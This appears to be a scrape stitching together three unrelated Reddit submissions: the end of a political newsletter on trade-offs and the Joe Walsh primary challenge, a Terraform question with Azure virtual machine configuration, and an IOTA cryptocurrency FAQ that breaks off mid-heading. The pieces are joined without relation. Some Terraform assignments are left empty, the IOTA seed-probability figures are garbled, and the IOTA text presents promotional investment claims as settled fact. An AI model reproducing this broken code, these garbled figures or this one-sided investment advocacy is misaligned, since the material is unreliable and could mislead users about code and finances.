Kingsley replies, accurately, that it “just makes my job harder.”
And the mom says, “Then your job is harder.”
I love that. I love it precisely because it recognizes that good parents recognize that there are trade-offs in life and that the best option isn’t always the most efficient one.
This is one of those places where you can see how wisdom and expertise can diverge from one another.
The Unity of Goodness
Efficiency can mean different things in different contexts. In business, it means profit maximization (or cost reduction, which is often the same thing). In sports, it means winning. Always giving the ball to the best player annoys the other players who want their own shot at glory, but so long as he can be counted on to score, most coaches will err on the side of winning. Starting one-legged players will wildly improve a basketball team’s diversity score, but it’s unlikely to improve the score that matters to coaches—or fans.
I’ve long argued that there’s something in the progressive mind that dislikes this whole line of thinking. They often tend to find the idea of trade-offs to be immoral or offensive. I call it the “unity of goodness” worldview. Once you develop an ear for it, you can hear it everywhere. “I refuse to believe that economic growth has to come at the expense of the environment.” “There’s no downside to putting women in combat.” “I don’t want to live in a society where families have to choose between X and Y,” or “I for one reject the idea that we have to sacrifice security for freedom—or freedom for security.” Both Bill Clinton and Barack Obama were masters at declaring that all hard choices were “false choices”—as if only mean-spirited people would say you can’t have your cake and eat it too.
Saint Greta
Nowhere is this mindset more on display in environmentalism. Everyone hawking the Green New Deal insists that it’s win-win all the way down. It’s Bastiat’s broken window parable on an industrialized scale. Spending trillions to switch to less efficient forms of energy will boost economic growth and create jobs, they insist. I’d have much more respect for these arguments if they simply acknowledged that doing a fraction of what they want will come at considerable cost.
Consider Greta Thunberg, the latest child redeemer of the climate change movement. She hates planes because they spew CO2. That’s why she sailed from Sweden to a conference in New York. As symbolism, it worked, at least for the people who already agree with her. But in economic terms, she might as well have raised the Spoon Banner off the main mast of her multi-million-dollar craft (that may have a minimal carbon footprint now, but required an enormous carbon down-payment to create). The organizers of this stunt had to fly two people to New York to bring the ship back across the Atlantic. And scores of reporters flew across the Atlantic to cover her heroic act of self-denial. Her nautical virtue signaling came at a price.
The organizers insist that they will buy carbon offsets to compensate for the damage done. But that’s just clever accounting. The cost is still real. And that’s not the only cost. It took her fifteen days to get to America. In other words, she actually proved the point of many of her critics. Fossil fuels come with costs all their own—geopolitical, environmental, etc.—but the upside of those downsides is far greater efficiency. If you want to get across the Atlantic in seven hours instead of two weeks, you need fossil fuels. The efficiency of modern technology reduces costs by giving human beings more time to do other stuff.
The Conservative Planners
The unity of goodness mindset has been spreading to the right these days as well. The new conservative critics of the free market see the efficiency of the market as a threat to other good things. And they’re right, as Joseph Schumpeter explained decades ago. For instance, just as earth-moving equipment replaces ditch-diggers in the name of efficiency, robots replace crane operators, and the communities that depended on those jobs often suffer as a result.
I have no quarrel with this observation. My problem is with the way they either sell their program as cost-free, or pretend that the right experts can run things better from Washington. They know which jobs or industries need the state to protect them from the market. They know how to run Facebook or Google to improve the Gross National Virtue Index. Many of the same people who once chuckled at the Spoons story now nod sagely. I don’t mean to say that there’s no room for government to regulate economic affairs. But I am at a loss as to why I should suspend my skepticism for right-wingers when they work from the same assumptions of the left-wingers I’ve been arguing with for decades.
Embracing Trumpism to Own Trump
Instead I want—or I guess need—to talk about another trade-off. I’ve been very reluctant to weigh in on the Joe Walsh project for a bunch of reasons. The biggest is that I am friends with some of the people cheering it on. But I think I have to offer my take.
I don’t get it.
Oh, I certainly understand the desire to see a primary challenger to Trump. I share that desire. And I understand the political calculation behind the effort. It’s like when one little league team brings in some dismayingly brawny and hirsute player from Costa Rica as a ringer. The other teams feel like they have to get their own 22-year-olds with photoshopped birth certificates in order to compete. My friend Bill Kristol is convinced that Trump must be defeated and that Walsh is just the mongoose to take on the Cobra-in-Chief.
I try not to recycle metaphors or analogies too much, but this seems like another example of a Col. Nicholson move. As I’ve written before, Col. Nicholson was the Alec Guinness character in The Bridge Over the River Kwai. The commanding officer of a contingent of mostly British POWs being held by the Japanese, Nicholson at first follows the rules and refuses to cooperate with his captors in their effort to use British captives as slave labor for a bridge project. But then his pride kicks in and he decides he will show the Japanese what real soldiering is like, agreeing to build the bridge as a demonstration of British superiority in civil engineering. [Spoiler alert] It’s only at the end of the film that he realizes that building the bridge may have been a kind of short-sighted moral victory, but in reality he was helping the Japanese kill allied troops because the bridge was going to be used for shipping Japanese troops and ammunition. When this realization finally arrives, he exclaims, “My God, what have I done?”
Walsh’s primary brief against Trump is that Trump is temperamentally unfit for office and a con man. Fair enough. But he has to focus his indictment on Trump’s erratic behavior. Why? Because he’s a terrible spokesman for much of the rest of the case against Trump. I may not call myself “Never Trump” any more, but I was in 2016. And back then, the argument against Trump wasn’t simply that he was erratic. It was also that he wasn’t a conservative, that he happily dabbled in racism and bigotry, and that he was crude, ill-informed, and narcissistically incapable of putting his personal interests and ego aside for the good of the country. I’m sure I’m leaving a few other things out. But you get the point.
Walsh may be sincere in his remorse over all the racist and incendiary things he said in the very recent past. He may regret supporting his anti-Semitic friend Paul Nehlen, though I haven’t found evidence of that. But none of that history should be seen as qualifications for the presidency, the Republican nomination, or support from conservatives.
And yet, it is precisely these things that make him attractive to his conservative supporters. Trump is an entertainer who trolls his enemies with offensive statements for attention, so let’s find someone who does the exact same thing!
Walsh may have been a one-term congressman, but his true vocation was as a shock-jock trolling provocateur. It’s ironic. As I’ve argued countless times, much of Trump’s bigotry in 2016 stemmed less from any core convictions than from a deep belief that the GOP’s base voters were bigoted and he needed to feed them red meat. Trump's reluctance to repudiate David Duke derived primarily from his ridiculous assumption that Duke had a large constituency he didn’t want to offend. He may have believed the Birther stuff, but he peddled it because that’s what his fans wanted. And Joe Walsh was one of those fans.
It may also be true that Walsh never really believed most of the bilge he was peddling and that he was doing the same thing Trump did—feeding the trolls—on a smaller scale. But if that’s the case, then he’s a con man, too.
I don’t want to beat up on Walsh too much because, again, his epiphany may be sincere. There are lots of people who pushed certain arguments too far only to recognize that the payoff was Trump and the transformation of conservatism into a form of right-wing identity politics. There are a lot of Col. Nicholsons out there. And I have too much respect for Bill Kristol to believe that he would lend his support to someone he believed to be as bigoted as the man Walsh seemed to be a few years ago.
But from where I sit, the prize we should keep our eyes on isn’t defeating Trump; it’s keeping conservatism from succumbing to Trumpism after he’s gone. This isn’t easy, and no tactic is guaranteed to be successful. We’ve never been here before. My own approach is to agree with Trump policies when I think they’re right—judges, buying Greenland, etc.—and disagreeing when they’re wrong. My own crutch is to simply tell the truth as I see it, regardless of whether it fits into some larger political agenda or strategy. Truth is always a legitimate defense of any statement.
But for those who see themselves as political players as well as public intellectuals, I think this is a terrible mistake. Intellectually and morally, the case for continued opposition to—or skepticism about, Trump cannot—or rather must not—be reduced to simple Trump hatred. But by rallying around Walsh—instead of, say, Mark Sanford, or Justin Amash, or, heh, General Mattis—that’s what it looks like. Because you can’t say, “I’m standing on principle in my opposition to a bigoted troll and con man as the leader of my party and my country and that’s why I am supporting a less successful bigoted troll and con man for president.” Walsh isn’t a conservative alternative to Trump; he’s an alternative version of Trump. And his candidacy only makes sense if you take the “binary choice” and “Flight 93” logic of 2016 and cast Trump in the role of Hillary.
Let’s imagine the Walsh gambit works beyond anyone’s dreams and Joe Walsh ends up getting the GOP nomination (a fairly ludicrous thought experiment, I know). If so, I have no doubt that my friend Bill Kristol will say, a la Col. Nicholson, “My God, what have I done.”
Various & Sundry
Canine Update: It’s good to be home. The beasts were delighted to see us. Everything is settling back to normal, except for one intriguing development. I think Zoë has finally had enough with Pippa’s tennis ball routine. The other day on the midday walk with the pack, Kirsten managed to film Zoë putting an end to the tennis ball shenanigans. She took the ball and buried it. It was, to use an inapt phrase, a baller move—and she was unapologetic about it. Maybe she just didn’t like all the commotion with the other dogs, because she’s tolerant of the tennis ball stuff again. Or maybe she was being protective of her sister given that many of the other dogs in the pack are known thieves. Regardless, they’re doing well and having fun.
If you haven’t tuned into The Remnant lately, please give it another try. The first episode of the week was with Niall Ferguson and the feedback has been great. The latest episode is with my friend and AEI colleague Adam White on all things constitutional. Word of mouth is really important in building up audiences, so if you can spread the word about The Remnant or this “news”letter, I’d be grateful.
submitted by Sir-Matilda to tuesday [link] [comments]

How to make a variable optional or required based on a condition?

I have the following configuration block for an Azure Virtual Machine.
terraform { required_version = ">= 0.12.0" required_providers { azurerm = ">= 1.33.0" random = ">=2.2" } } locals { os_type = substr(var.image_reference_publisher, 0, 9) == "Microsoft" ? "Windows" : "Linux" dynamic_linux = local.os_type == "Linux" ? { dummy_create = true } : {} dynamic_windows = local.os_type == "Windows" ? { dummy_create = true } : {} dynamic_ssh_keys = var.disable_password_authentication == true ? { dummy_create = true } : {} } resource "azurerm_resource_group" "vm" { name = var.resource_group_name location = var.location tags = var.tags } resource "random_id" "vm-sa" { keepers = { vm_name = var.vm_name } byte_length = 6 } resource "azurerm_storage_account" "vm-sa" { count = var.boot_diagnostics == true ? 1 : 0 name = "bootdiag${lower(random_id.vm-sa.hex)}" resource_group_name = location = var.location account_tier = var.boot_diagnostics_sa_tier account_replication_type = var.boot_diagnostics_sa_replication_type tags = var.tags } resource "azurerm_availability_set" "vm" { count = var.availability_set == true ? 1 : 0 name = "avset" location = azurerm_resource_group.vm.location resource_group_name = platform_fault_domain_count = var.platform_fault_domain_count platform_update_domain_count = var.platform_update_domain_count managed = var.managed tags = var.tags } resource "azurerm_network_interface" "vm" { name = "nic" location = azurerm_resource_group.vm.location resource_group_name = network_security_group_id = var.network_security_group_id enable_accelerated_networking = var.enable_accelerated_networking ip_configuration { name = "ipconfig" subnet_id = var.subnet_id private_ip_address_allocation = var.private_ip_address_allocation private_ip_address = var.private_ip_address_allocation == "Static" ? var.private_ip_address : "" private_ip_address_version = var.private_ip_address_version public_ip_address_id = length(azurerm_public_ip.vm[0].id) > 0 ? azurerm_public_ip.vm[0].id : null primary = var.primary } tags = var.tags } resource "azurerm_public_ip" "vm" { count = var.enable_public_ip == true ? 1 : 0 name = "Test-publicIP" location = var.location resource_group_name = allocation_method = var.public_ip_address_allocation domain_name_label = var.domain_name_label sku = var.public_ip_sku ip_version = var.public_ip_version idle_timeout_in_minutes = var.idle_timeout_in_minutes reverse_fqdn = var.reverse_fqdn public_ip_prefix_id = var.public_ip_prefix_id zones = var.zones tags = var.tags } resource "azurerm_virtual_machine" "vm" { name = var.vm_name location = var.location resource_group_name = var.resource_group_name network_interface_ids = [] vm_size = var.vm_size availability_set_id = var.availability_set == true ? azurerm_availability_set.vm[0].id : null delete_os_disk_on_termination = var.delete_os_disk_on_termination delete_data_disks_on_termination = var.delete_data_disks_on_termination storage_image_reference { publisher = var.image_reference_publisher offer = var.image_reference_offer sku = var.image_reference_sku version = var.image_reference_version id = var.storage_image_reference_id } storage_os_disk { name = "os-disk" caching = var.os_disk_caching create_option = var.os_disk_create_option managed_disk_id = var.os_managed_disk_id managed_disk_type = var.os_disk_managed_disk_type disk_size_gb = var.os_disk_size_gb image_uri = var.os_disk_image_uri vhd_uri = var.os_disk_vhd_uri write_accelerator_enabled = var.os_disk_write_accelerator_enabled } os_profile { computer_name = var.computer_name admin_username = var.admin_username admin_password = var.admin_password custom_data = var.custom_data } dynamic "os_profile_linux_config" { for_each = local.dynamic_linux content { disable_password_authentication = var.disable_password_authentication dynamic "ssh_keys" { for_each = local.dynamic_ssh_keys content { path = "/home/${var.admin_username}/.ssh/authorized_keys" key_data = var.ssh_key } } } } dynamic "os_profile_windows_config" { for_each = local.dynamic_windows content { provision_vm_agent = var.provision_vm_agent enable_automatic_upgrades = var.enable_automatic_upgrades timezone = var.timezone } } boot_diagnostics { enabled = var.boot_diagnostics storage_uri = var.boot_diagnostics == true ? azurerm_storage_account.vm-sa[0].primary_blob_endpoint : "" } tags = var.tags } resource "azurerm_virtual_machine_data_disk_attachment" "vm" { count = var.data_disk == true ? 1 : 0 managed_disk_id = var.data_managed_disk_id virtual_machine_id = lun = var.lun caching = var.data_disk_caching write_accelerator_enabled = var.data_disk_write_accelerator_enabled }
# Resource Group variable "resource_group_name" { description = "Resource group name." type = string default = "mytest-rg" } variable "location" { description = "Location." type = string default = "canadacentral" } #Storage Account variable "boot_diagnostics_sa_tier" { description = "(Required) Defines the Tier to use for this storage account. Valid options are Standard and Premium. For FileStorage accounts only Premium is valid. Changing this forces a new resource to be created." type = string default = "Standard" } variable "boot_diagnostics_sa_replication_type" { description = "(Required) Defines the type of replication to use for this storage account. Valid options are LRS, GRS, RAGRS and ZRS." type = string default = "LRS" } #Virtual Machine variable "vm_name" { description = "(Required) Specifies the name of the Virtual Machine. Changing this forces a new resource to be created." type = string } variable "vm_size" { description = "(Required) Specifies the size of the Virtual Machine." type = string default = "Standard_DS1_V2" } variable "boot_diagnostics" { description = "Set this variable to 'true' to enable boot diagnostics for your Virtual Machine." type = bool default = false } variable "delete_os_disk_on_termination" { description = " (Optional) Should the OS Disk (either the Managed Disk / VHD Blob) be deleted when the Virtual Machine is destroyed? Defaults to false." type = bool default = false } variable "delete_data_disks_on_termination" { description = "(Optional) Should the Data Disks (either the Managed Disks / VHD Blobs) be deleted when the Virtual Machine is destroyed? Defaults to false." type = bool default = false } variable "image_reference_publisher" { description = "(Required) Specifies the publisher of the image used to create the virtual machine. Changing this forces a new resource to be created." type = string } variable "image_reference_offer" { description = " (Required) Specifies the offer of the image used to create the virtual machine. Changing this forces a new resource to be created." type = string } variable "image_reference_sku" { description = "(Required) Specifies the SKU of the image used to create the virtual machine. Changing this forces a new resource to be created." type = string } variable "image_reference_version" { description = "(Optional) Specifies the version of the image used to create the virtual machine. Changing this forces a new resource to be created." type = string default = "latest" } variable "storage_image_reference_id" { description = "(Required) Specifies the ID of the Custom Image which the Virtual Machine should be created from. Changing this forces a new resource to be created." default = null } variable "os_disk_caching" { description = "(Optional) Specifies the caching requirements for the Data Disk. Possible values include None, ReadOnly and ReadWrite." type = string default = "ReadWrite" } variable "os_disk_create_option" { description = "(Required) Specifies how the data disk should be created. Possible values are Attach, FromImage and Empty." type = string default = "FromImage" } variable "os_managed_disk_id" { description = " (Optional) Specifies the ID of an Existing Managed Disk which should be attached to this Virtual Machine. When this field is set create_option must be set to Attach." default = null } variable "os_disk_managed_disk_type" { description = "(Optional) Specifies the type of managed disk to create. Possible values are either Standard_LRS, StandardSSD_LRS, Premium_LRS or UltraSSD_LRS." default = null } variable "os_disk_size_gb" { description = "(Optional) Specifies the size of the OS Disk in gigabytes." type = number default = 127 } variable "os_disk_image_uri" { description = " (Optional) Specifies the Image URI in the format publisherName:offer:skus:version. This field can also specify the VHD uri of a custom VM image to clone. When cloning a Custom (Unmanaged) Disk Image the os_type field must be set." default = null } variable "os_disk_write_accelerator_enabled" { description = "(Optional) Specifies if Write Accelerator is enabled on the disk. This can only be enabled on Premium_LRS managed disks with no caching and M-Series VMs. Defaults to false." type = bool default = false } variable "os_disk_vhd_uri" { description = " (Optional) Specifies the URI of the VHD file backing this Unmanaged OS Disk. Changing this forces a new resource to be created." default = null } variable "computer_name" { description = "(Required) Specifies the host name of the Virtual Machine." type = string } variable "admin_username" { description = "(Required) Specifies the name of the local administrator account." type = string } variable "admin_password" { description = "(Required for Windows, Optional for Linux) The password associated with the local administrator account. NOTE: 'admin_password' must be between 6-72 characters long and must satisfy at least 3 of password complexity requirements from the following: 1. Contains an uppercase character 2. Contains a lowercase character 3. Contains a numeric digit 4. Contains a special character" default = null } variable "custom_data" { description = "(Optional) Specifies custom data to supply to the machine. On Linux-based systems, this can be used as a cloud-init script. On other systems, this will be copied as a file on disk. Internally, Terraform will base64 encode this value before sending it to the API. The maximum length of the binary array is 65535 bytes." default = null } variable "disable_password_authentication" { description = "(Required) Specifies whether password authentication should be disabled. If set to false, an admin_password must be specified." type = bool default = false } variable "ssh_key" { description = "(Required) The Public SSH Key which should be written to the path defined in the ssh_key block." default = "" } variable "provision_vm_agent" { description = "(Optional) Should the Azure Virtual Machine Guest Agent be installed on this Virtual Machine? Defaults to false." type = bool default = true } variable "enable_automatic_upgrades" { description = "(Optional) Are automatic updates enabled on this Virtual Machine? Defaults to false." type = bool default = false } variable "timezone" { description = "(Optional) Specifies the time zone of the virtual machine, the possible values are defined" default = null } variable "winrm_protocol" { description = "(Required) Specifies the protocol of listener. Possible values are HTTP or HTTPS." default = null } variable "winrm_certificate_url" { description = " (Optional) The ID of the Key Vault Secret which contains the encrypted Certificate which should be installed on the Virtual Machine. This certificate must also be specified in the vault_certificates block within the os_profile_secrets block." default = null } # Availability Set variable "availability_set" { description = "Set this varible to 'true' to add your Virtual Machine to a availability set." type = bool default = true } variable "platform_update_domain_count" { description = "(Optional) Specifies the number of update domains that are used. Defaults to 5. NOTE: The number of Update Domains varies depending on which Azure Region you're using" type = number default = 2 } variable "platform_fault_domain_count" { description = "(Optional) Specifies the number of fault domains that are used. Defaults to 3. NOTE: The number of Fault Domains varies depending on which Azure Region you're using." type = number default = 2 } variable "proximity_placement_group_id" { description = "(Optional) The ID of the Proximity Placement Group to which this Virtual Machine should be assigned. Changing this forces a new resource to be created." type = string default = null } variable "managed" { description = "(Optional) Specifies whether the availability set is managed or not. Possible values are true (to specify aligned) or false (to specify classic). Default is false." type = bool default = true } # Puplic IP variable "enable_public_ip" { description = "Set this variable to 'true' to attach a Pulic IP to the Network Interface." type = bool default = true } variable "public_ip_sku" { description = "(Optional) The SKU of the Public IP. Accepted values are Basic and Standard. Defaults to Basic." type = string default = "Basic" } variable "public_ip_address_allocation" { description = "(Required) Defines the allocation method for this IP address. Possible values are Static or Dynamic." type = string default = "Static" } variable "public_ip_version" { description = "(Optional) The IP Version to use, IPv6 or IPv4." type = string default = "IPv4" } variable "idle_timeout_in_minutes" { description = "(Optional) Specifies the timeout for the TCP idle connection. The value can be set between 4 and 30 minutes." type = number default = 4 } variable "domain_name_label" { description = "(Optional) Label for the Domain Name. Will be used to make up the FQDN. If a domain name label is specified, an A DNS record is created for the public IP in the Microsoft Azure DNS system." type = string default = null } variable "reverse_fqdn" { description = "(Optional) A fully qualified domain name that resolves to this public IP address. If the reverseFqdn is specified, then a PTR DNS record is created pointing from the IP address in the domain to the reverse FQDN." type = string default = null } variable "public_ip_prefix_id" { description = "(Optional) If specified then public IP address allocated will be provided from the public IP prefix resource." type = string default = null } variable "zones" { description = "(Optional) A collection containing the availability zone to allocate the Public IP in." default = null } # Network Interface variable "network_security_group_id" { description = "(Optional) The ID of the Network Security Group to associate with the network interface." type = string default = "" } variable "enable_accelerated_networking" { description = "(Optional) Enables Azure Accelerated Networking using SR-IOV. Only certain VM instance sizes are supported. Refer to Defaults to false." type = bool default = false } variable "dns_servers" { description = "(Optional) List of DNS servers IP addresses to use for this NIC, overrides the VNet-level server list." type = list(string) default = [""] } variable "subnet_id" { description = " (Optional) Reference to a subnet in which this NIC has been created. Required when private_ip_address_version is IPv4." type = string default = "" } variable "private_ip_address" { description = "(Optional) Static IP Address." default = null } variable "private_ip_address_allocation" { description = "(Required) Defines how a private IP address is assigned. Options are 'Static' or 'Dynamic'." type = string default = "Dynamic" } variable "private_ip_address_version" { description = "(Optional) The IP Version to use. Possible values are IPv4 or IPv6. Defaults to IPv4." type = string default = "IPv4" } variable "primary" { description = "(Optional) Is this the Primary Network Interface? If set to true this should be the first ip_configuration in the array." type = bool default = "true" } # Virtual Machine Data Disk Attachment variable "data_disk" { description = "Set this variable to 'true' to attach a data disk." type = bool default = false } variable "virtual_machine_id" { description = "(Required) The ID of the Virtual Machine to which the Data Disk should be attached. Changing this forces a new resource to be created." default = null } variable "data_managed_disk_id" { description = "(Required) The ID of an existing Managed Disk which should be attached. Changing this forces a new resource to be created." default = "" } variable "lun" { description = "(Required) The Logical Unit Number of the Data Disk, which needs to be unique within the Virtual Machine. Changing this forces a new resource to be created." type = number default = 10 } variable "data_disk_caching" { description = "(Required) Specifies the caching requirements for this Data Disk. Possible values include None, ReadOnly and ReadWrite." type = string default = "ReadWrite" } variable "data_disk_create_option" { description = "(Optional) The Create Option of the Data Disk, such as Empty or Attach. Defaults to Attach. Changing this forces a new resource to be created." type = string default = "Attach" } variable "data_disk_write_accelerator_enabled" { description = "(Optional) Specifies if Write Accelerator is enabled on the disk. This can only be enabled on Premium_LRS managed disks with no caching and M-Series VMs. Defaults to false." type = bool default = false } # Commons variable "tags" { description = "(Optional) A mapping of tags to assign to the resource." type = map(string) default = { CreatedBy = "Terraform" } } 
I want to enforce to define the variable admin_password if the disable_password_authentication is set to true. If I set the admin_password defaults to null then it won't prompt you for the password and if I omit the default it will prompt for the password even if I set disable_password_authentication to true.
submitted by jsapkota to Terraform [link] [comments]

FUD Copy Pastas

**Last updated: May 30, 2018: Updated wallet info with release of Trinity.
This 4 part series from the IOTA foundation covers most of the technical FUD centered at IOTA.
Also the official IOTA faq on answers nearly all of these questions if you want to hear the answers directly.
Purpose of Writing
Since posting FUD is so ridiculously low-effort in comparison to setting the record straight, I felt it necessary to put a log of copy-pastas together to balance the scales so its just as easy to answer the FUD as it was to generate it. So next time you hear someone say "IOTA is centralized", you no longer have to take an hour out of your day and spin your wheels with someone who likely had an agenda to begin with. You just copy-paste away and move on.
It's also worth mentioning IOTA devs are too damn busy working on the protocol and doing their job to answer FUD. So I felt a semblance of responsibility.
Here they are. These answers are too my understanding so if you see something that doesn't look right let me know! They are divided into the following categories so if you are interested in a specific aspect of IOTA you can scroll to that section.


IOTA was hacked and users funds were stolen!

First, IOTA was not hacked. The term “hacked” is thrown around way too brazingly nowadays and often used to describe events that weren’t hacks to begin with. Its a symptom of this space growing way too fast creating situations of the blind leading the blind and causing hysteria.
What happened:
Many IOTA users trusted a certain 3rd party website to create their seed for their wallets. This website silently sent copies of all the seeds generated to an email address and waited till it felt it had enough funds, then it took everyones money simultaneously. That was the ”hack”.
The lesson:
The absolute #1 marketed feature of crypto is that you are your own bank. Of everything that is common knowledge about crypto, this is at the top. But being your own bank means you are responsible for the security of your own funds. There is no safety net or centralized system in place that is going to bail you out.
For those that don’t know (and you really should if you’ve invested in anything crypto), your seed is your username-pw-security question-backup email all rolled into one. Would you trust a no-name 3rd party website to produce your username+pw for your bank account? Because thats essentially what users did.
The fix:
Make your seed offline with the generators in the sidebar or use dice. This is outlined in the “how to generate wallet and seed” directly following.
The trinity and carriota wallets will have seed generators within them upon their release.

How to generate wallet and seed

1) Download official trinity wallet here
2) follow the instructions on the app.
3) Do not run any apps in conjunction with the trinity app. Make sure all other apps are completely closed out on your device.

Are you sure a computer can’t just guess my seed?

An IOTA seed is 81 characters long. There are more IOTA seed combinations than atoms in the universe. All the computers in the world combined would take millions billions of years just to find your randomly generated one that’s located somewhere between the 0th and the 2781st combination. The chance for someone to randomly generate the exact same seed as yours is 1 / (2781).
If you can’t fathom the number 27 ^ 81, this video should help:

Why is Trinity wallet taking so long!!??

Trinity is out.


IOTA introduction video to share with family

Tangle visualizers

How to setup a full node

Download Bolero and run! Bolero is an all-in-one full node install package with the latest IOTA IRI and Nelson all under a one-click install!
"If you want to help the network then spam the network. If you really want to help the network then create a full node and let others spam you!"

No questions or concerns get upvoted, only downvoted!

That’s just the nature of this business. Everyone in these communities has money at stake and are extremely incentivized to keep only positive news at the top of the front page. There is nothing you're going to do about that on this subreddit or any crypto subreddit. It's just a reddit fact of life we have to deal with. Everyone has a downvote and everyone has an upvote. But what can be done is just simply answer the questions even if they are downvoted to hell. Yea most people wont' see the answers or discussion but that one person will. every little bit counts.
I will say that there are most certainly answers to nearly every FUD topic out there. Every single one. A lot of the posts I'm seeing as of late especially since the price spike are rehashed from months ago. They are often not answered not because there isn't an answeexplanation, but because regulars who have the answers simply don't see them (for the reason listed above). I can see how it's easy for this to be interpreted (especially by new users) as there not being an answer or "the FUDsters are on to something" but thats just not the case.

Developer's candidness (aka dev's are assholes!)
Lastly and to no surprise, David conducts himself very professionally in this interview even when asked several tough questions about the coordinator and MIT criticism.

IOTA Devs do not respond appropriately to criticism

When critiquers provide feedback that is ACTUALLY useful to the devs, then sure they'll be glad to hear it. So far not once has an outside dev brought up something that the IOTA devs found useful. Every single time it ends up being something that was already taken into consideration with the design and if the critiquer did an ounce of research they would know that. Thus you often find the IOTA devs dismissing their opinion as FUD and responding with hostility because all their critique is really doing is sending the message to their supporters that they are not supposed to like IOTA anymore.
Nick Johnson was a perfect example of this. The Ethereum community was co-existing [peacefully]with IOTA’s community (as they do with nearly all alt coins) until Nick wrote his infamous article. Then almost overnight Ethereum decided it didn’t like IOTA anymore and we’ve been dealing with that shit since. As of today, add LTC to that list with Charlie’s (even admitting) ignorant judgement of IOTA.
12/17/2017: Add John McAfee (bitcoin cash) and Peter Todd (bitcoin) to the list of public figures who have posted ignorantly on IOTA.

A lot of crypto communities certainly like to hate on IOTA...

IOTA is disrupting the disrupters. It invented a completely new distributed ledger infrastructure (the tangle) that replaces the blockchain and solves all of its fundamental problems (namely fees and scaling). To give you an idea of this significance, 99% of the cryptocurrencies that exist are built on a block chain. These projects have billions of dollars invested into them meaning everyone in their communities are incentivized to see IOTA fail and spread as much FUD about it as possible. This includes well known organizations, public figures, and brands. Everyone commenting in these subreddits and crypto communities have their own personal money at stake and skin in the game. Misinformation campaigns, paid reddit posters, upvote/downvote bots, and corrupt moderators are all very real in this space.


How do I buy IOTA

What is the IOTA foundation?

IOTA foundation is a non-profit established in Germany and recognized by the European Union. Blog post here:

How many companies and organizations are interested, partnered or actively using IOTA?

A lot, and often too many to keep up with.

How was IOTA distributed?

All IOTAs that will ever exist were sold at the ICO in 2015. There was no % reserved for development. Devs had to buy in with their personal money. Community donated back 5% of all IOTA so the IOTA foundation could be setup.

No inflation schedule? No additional coins? How is this sustainable?

Interestingly enough, IOTA is actually the only crypto that does not run into any problems with a currency cap and deflationaryism. Because there are zero fees, you will always be able to pay for something for exactly what it's worth using IOTA, no matter how small the value. If by chance in the future a single iota grows so large in value that it no longer allows someone to pay for something in fractions of a penny, the foundation would just add decimal points allowing for a tenth or a hundreth or a thousandth of an iota to be transacted with.
To give you some perspective, if a single IOTA equals 1 penny, IOTA would have a 27 trillion dollar market cap (100x that of Bitcoin's today)

IOTA is not for P2P, only for M2M

With the release of the trinity wallet, it's now dead simple for anyone to use IOTA funds for P2P. Try it out.

Companies technically don’t have to use the IOTA token

Yes they do
Worth clarifying that 0 iota data transactions are perfectly fine and are welcomed since they still provide pow for 2 other transactions and help secure the network. In the early stages, these types of transactions will probably be what give us the tps/pow needed to remove the coordinator and allow the network defend 34% attacks organically.
But... if someone does not want to sell or exchange their data for free (0 IOTA transaction), then Dominic is saying that the IOTA token must be used for that or any exchange in value on the network.
This is inherently healthy for the ecosystem since it provides a neutral and non-profit middle ground that all parties/companies can trust. If one company made their own token it wouldn’t be trusted since companies are incentivized by profits and nothing is stopping them from manipulating their token to make them more money. Thus, the IOTA foundation will not partner with anyone who refuses to take this option off the table.

All these companies are going to influence IOTA development!!

These companies have no influence on the development of IOTA. They either choose to use it or they don’t.

Internet of things is cheap and will stay cheap

Internet of things is one application of IOTA and considered by many to be the 4th industrial revolution. Go do some googling. IOTA having zero fees enables M2M for the first time in history. Also, if a crypto can do M2M it sure as shit can do M2P and P2P. M2M is hard mode.

IOTA surpassing speculation

IOTA, through the data marketplace and [qubic](, will be the first crypto to surpass speculation and actually be used in the real world for something. From there, it will branch out into other use cases, such as P2P. Or maybe P2P use of IOTA will grow in parallel with M2M, because why not?
12/19/17 update: Bosch reinforces IOTA's break-out from speculation by buying IOTA tokens for its future use in the data marketplace.

Investing in a new project barely off the ground

Investing in a project in its early stages was something typically reserved for wealthy individuals/organizations before ICO’s became a thing. With early investing comes much less hand holding and more responsibility on the user to know what they are doing. If you have a hard time accepting this responsibility, don’t invest and wait for the technology to get easier for you. How many people actually knew how to use and mine bitcoin in 2009 before it had all its gui infrastructure?
IOTA is a tangle, the first of its kind. NOT a copy paste blockchain. As a result wallets and applications for IOTA are the first of their kind and translating the tangle into a nice clean user-friendly blockchain experience for the masses is even more taxing.

Why is the price of my coin falling?!

This may be the most asked question on any crypto subreddit but it's also the easiest to explain. The price typically falls when bad things happen to a coin or media fabricates bad news about a coin and a portion of investors take it seriously. The price increases when good things happen to a coin, such as a new exchange listing or a partnership announced etc.. The one piece that is often forgotten but trumps all these effects is something called "market forces".
Market forces is what happens to your coin when another coin gets a big news hit or a group of other coins get big news hits together. For example, when IOTA data marketplace released, IOTA hit a x5 bull run in a single week. But did you notice all the other alt coins in the red? There are a LOT of traders that are looking at the space as a whole and looking to get in on ANY bull action and will sell their other coins to do so. This effect can also be compounded over a long period of time such as what we witnessed when the bitcoin fork FOMO was going on and alt coins were squeezed continuously to feed it for weeks/months.
These examples really just scratch the surface of market forces but the big takeaway is that your coin or any coin will most certainly fall (or rise) in price at the result of what other coins are doing, with the most well known example being bitcoin’s correlation to every coin on the market. If you don't want to play the market-force game or don't have time for it, then you can never go wrong buying and holding.
It's also important to note that there are layers of investors. There's a top layer of light-stepping investors that are a mixture of day traders and gamblers trying to jump in and jump out to make quick money then look for the next buying (or shorting) opportunity at another coin. There's a middle layer of buyers and holders who did their research, believe in the tech and placing their bets it will win out in the long run. And the bottom layer are the founders and devs that are in it till the bitter end and there to see the vision realized. When a coin goes on a bull run, always expect that any day the top layer is going to pack up and leave to the next coin. But the long game is all about that middle layer. That is the layer that will be giving the bear markets their price-drop resistance. That is why the meme "HODL" is so effective because it very elegantly simplifies this whole concept for the common joe and makes them a part of that middle layer regardless if they understand whats going on or not.


How is IOTA free and how does it scale

IOTA is an altruistic system. Proof of work is done in IOTA just like bitcoin. Only a user’s device/phone must do pow for 2 other transactions before issuing one of its own. Therefore no miners and no fees. And the network becomes faster the more transactions are posted. Because of this, spamming the network is encouraged since they provide pow for 2 other transactions and speed up the network.

IOTA is centralized

